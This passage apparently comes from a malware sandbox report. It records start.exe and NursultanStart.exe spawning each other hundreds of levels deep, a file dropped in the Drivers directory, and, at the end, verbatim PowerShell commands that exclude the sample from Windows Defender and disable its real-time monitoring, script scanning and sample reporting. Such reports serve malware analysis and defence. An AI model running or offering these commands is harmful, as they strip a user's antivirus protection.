        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        273⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        274⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        274⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        275⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        275⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        276⤵
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        276⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        277⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        277⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        278⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        278⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        279⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        279⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        280⤵
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        280⤵
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        281⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        281⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        282⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        282⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        283⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        283⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        284⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        284⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        285⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        285⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        286⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        286⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        287⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        287⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        288⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        288⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        289⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        289⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        290⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        290⤵
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        291⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        291⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        292⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        292⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        293⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        293⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        294⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        294⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        295⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        295⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        296⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        296⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        297⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        297⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        298⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        298⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        299⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        299⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        300⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        300⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        301⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        301⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        302⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        302⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        303⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        303⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        304⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        304⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        305⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        305⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        306⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        306⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        307⤵
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        307⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        308⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        308⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        309⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        309⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        310⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        310⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        311⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        311⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        312⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        312⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        313⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        313⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        314⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        314⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        315⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        315⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        316⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        316⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        317⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        317⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        318⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        318⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        319⤵
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        319⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        320⤵
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        320⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        321⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        321⤵
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        322⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        322⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        323⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        323⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        324⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        324⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        325⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        325⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        326⤵
        
        PID:672
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        326⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        327⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        327⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        328⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        328⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        329⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        329⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        330⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        330⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        331⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        331⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        332⤵
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        332⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        333⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        333⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        334⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        334⤵
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        335⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        335⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        336⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        336⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        337⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        337⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        338⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        338⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        339⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        339⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        340⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        340⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        341⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        341⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        342⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        342⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        343⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        343⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        344⤵
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        344⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        345⤵
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        345⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        346⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        346⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        347⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        347⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        348⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        348⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        349⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        349⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        350⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        350⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        351⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        351⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        352⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        352⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        353⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        353⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        354⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        354⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        355⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        355⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        356⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        356⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        357⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        357⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        358⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        358⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        359⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        359⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        360⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        360⤵
        Checks computer location settings
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        361⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        361⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        362⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        362⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        363⤵
        Drops file in Drivers directory
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe'
        364⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        365⤵
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        364⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1472
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        365⤵
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
